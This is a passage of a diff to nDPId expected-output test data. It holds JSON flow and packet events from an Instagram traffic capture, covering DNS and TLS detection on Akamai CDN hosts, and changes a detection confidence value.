00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1436720908579,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1436720908579,"pkt":"QPMIw47hABsv8H60CABFAADD9DAAADgRvNoICAgIwKgAZwA1Z6wAr0GdhbOBgAABAAQAAAAAEGlnY2RuLXBob3Rvcy1nLWEIYWthbWFpaGQDbmV0AAABAAHADAAFAAEAAAA3ACoQaWdjZG4tcGhvdG9zLWctYQhha2FtYWloZANuZXQJZWRnZXN1aXRlwCbAOwAFAAEAAFQ9ABYFYTEwMDcGZHNwdzQzBmFrYW1hacAmwHEAAQABAAAAEwAELiFGiMBxAAEAAQAAABMABC4hRo4="} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908533,"flow_last_seen":1436720908579,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1436720908579,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-g-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"46.33.70.136"}} 
+00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908533,"flow_last_seen":1436720908579,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1436720908579,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-g-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"46.33.70.136"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908581,"flow_last_seen":1436720908581,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908581,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1436720908581,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908581,"pkt":"ABsv8H60QPMIw47hCABFAAA8pvhAAEAGXgvAqABnLiFGiO3sAbtrdUh\/AAAAAKACOQg15wAAAgQFtAQCCAoAA+6HAAAAAAEDAwY="} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1436720908594,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908594,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGC94uIUauwKgAZwG7rg7lq\/ivshtmvaASOJCK2QAAAgQFlgQCCAquiQq2AAPuhgEDAwU="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1436720908594,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908594,"pkt":"ABsv8H60QPMIw47hCABFAAA0iDtAAEAGfKrAqABnLiFGrq4OAbuyG2a95av4sIAQAOU2BQAAAQEICgAD7oiuiQq2"} -00978{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908572,"flow_last_seen":1436720908596,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1436720908596,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00978{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908572,"flow_last_seen":1436720908596,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1436720908596,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1436720908603,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908603,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGDAQuIUaIwKgAZwG77ezRfJMua3VIgKASOJCHDAAAAgQFlgQCCArOjo1YAAPuhwEDAwU="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1436720908603,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908603,"pkt":"ABsv8H60QPMIw47hCABFAAA0pvlAAEAGXhLAqABnLiFGiO3sAbtrdUiA0XyTL4AQAOU13wAAAQEICgAD7onOjo1Y"} 
-00977{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908581,"flow_last_seen":1436720908606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1436720908606,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00977{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908581,"flow_last_seen":1436720908606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1436720908606,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1436720908615,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908615,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGE75SVRqawKgAZwG7oN0D2rVm4E5xhKASOJDLywAAAgQFlgQCCApUeSUGAAPuhgEDAwU="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1436720908615,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908615,"pkt":"ABsv8H60QPMIw47hCABFAAA0nwZAAEAGbb\/AqABnUlUamqDdAbvgTnGEA9q1Z4AQAOUuJQAAAQEICgAD7opUeSUG"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1436720908616,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908616,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGE75SVRqawKgAZwG7oN5hmBQZ4jr3HqASOJCH0wAAAgQFlgQCCApUeSUGAAPuhgEDAwU="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1436720908616,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908616,"pkt":"ABsv8H60QPMIw47hCABFAAA0GZxAAEAG8ynAqABnUlUamqDeAbviOvceYZgUGoAQAOUuJQAAAQEICgAD7opUeSUG"} 
-00977{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908576,"flow_last_seen":1436720908617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1436720908617,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00977{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908577,"flow_last_seen":1436720908619,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1436720908619,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908581,"flow_last_seen":1436720908633,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1436720908633,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} -01430{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908581,"flow_last_seen":1436720908634,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4354,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1436720908634,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} -01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908572,"flow_last_seen":1436720908636,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1868,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1436720908636,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} 
-01430{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":393,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908572,"flow_last_seen":1436720908638,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1436720908638,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-h-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"7df57c06f869fc3ce509521cae2f75ce","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} 
-01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908576,"flow_last_seen":1436720908660,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1436720908660,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} -01430{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":402,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908576,"flow_last_seen":1436720908661,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1436720908661,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} -01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908577,"flow_last_seen":1436720908663,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1644,"flow_avg_l4_payload_len":274,"midstream":0,"thread_ts_msec":1436720908663,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} 
-01430{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908577,"flow_last_seen":1436720908665,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4322,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":1436720908665,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","server_names":"a248.e.akamai.net,*.akamaihd.net,*.akamaihd-staging.net,*.akamaized.net,*.akamaized-staging.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=NL, L=Amsterdam, O=Verizon Enterprise Solutions, OU=Cybertrust, CN=Verizon Akamai SureServer CA G14-SHA1","subjectDN":"C=US, ST=MA, L=Cambridge, O=Akamai Technologies Inc., CN=a248.e.akamai.net","fingerprint":"EA:5A:20:95:78:D7:09:60:5C:A1:E4:CA:A5:2B:BD:C1:78:FB:23:23"}} +00977{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908576,"flow_last_seen":1436720908617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1436720908617,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00977{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720908577,"flow_last_seen":1436720908619,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1436720908619,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-a-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01031{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720908581,"flow_last_seen":1436720908633,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1436720908633,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"igcdn-photos-g-a.akamaihd.net","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"34d6f0ad0a79e4cfdf145e640cc93f78","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"}} 